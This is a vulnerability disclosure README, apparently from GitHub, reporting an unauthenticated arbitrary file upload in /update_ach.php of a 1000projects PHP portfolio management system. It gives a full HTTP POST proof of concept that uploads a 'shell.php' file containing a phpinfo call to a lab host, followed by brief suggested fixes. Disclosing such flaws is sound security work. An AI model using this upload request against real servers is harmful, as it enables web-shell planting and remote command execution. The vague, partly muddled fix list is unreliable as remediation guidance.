Skip to content

Latest commit

 

History

History
102 lines (69 loc) · 3.54 KB

README5.md

File metadata and controls

102 lines (69 loc) · 3.54 KB
Raw

1000projects Portfolio Management System MCA Project using PHP and MySQL V1.0 /update_ach.php unrestricted file upload

NAME OF AFFECTED PRODUCT(S)

  • Portfolio Management System MCA Project using PHP and MySQL

Vendor Homepage

Software Link

Vendor

  • 1000projects

Vulnerability Type

  • Unrestricted Upload

Root Cause

  • An arbitrary file upload vulnerability was found in the /update_ach.php file of the "Portfolio Management System MCA Project using PHP and MySQL" project. This vulnerability can be exploited without requiring any special permissions.

Impact

  • Attackers can use this arbitrary file upload vulnerability to control servers and remote command execution, which poses a serious threat to system security and business continuity.

DESCRIPTION

  • During the security review of "Portfolio Management System MCA Project using PHP and MySQL", wangjiawei discovered a critical arbitrary file upload vulnerability in the "/update_ach.php" file. This vulnerability can be exploited without requiring any special permissions. Immediate remedial measures are needed to ensure system security and protect data integrity.

Vulnerability details and POC

poc

POST /update_ach.php HTTP/1.1
Host: 192.168.75.230:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------421080354430954489792376579423
Content-Length: 1093
Origin: http://192.168.75.230:8080
Sec-GPC: 1
Connection: close
Referer: http://192.168.75.230:8080/update_ach_details.php?q=MTA=
Cookie: PHPSESSID=1cjhi762j9p9u38q0dhos6fjqn
Upgrade-Insecure-Requests: 1
Priority: u=0, i

-----------------------------421080354430954489792376579423
Content-Disposition: form-data; name="reg_id"

29
-----------------------------421080354430954489792376579423
Content-Disposition: form-data; name="ach_id"

10
-----------------------------421080354430954489792376579423
Content-Disposition: form-data; name="ach_name"

Code Expert
-----------------------------421080354430954489792376579423
Content-Disposition: form-data; name="ach_rank"

3rd
-----------------------------421080354430954489792376579423
Content-Disposition: form-data; name="ach_year"

2017
-----------------------------421080354430954489792376579423
Content-Disposition: form-data; name="ach_certy"; filename="shell.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------421080354430954489792376579423
Content-Disposition: form-data; name="ach_certy_old"

certy2.png
-----------------------------421080354430954489792376579423
Content-Disposition: form-data; name="submit"

Update
-----------------------------421080354430954489792376579423--

Suggested fixes

  1. The storage location of the uploaded file is separate from the server.
  2. Modify the file name and file suffix of the uploaded file. (How to determine the suffix name to prevent modification: front-end pass, back-end re-check)
  3. The file upload path is separated based on the service. Download according to the generated file name.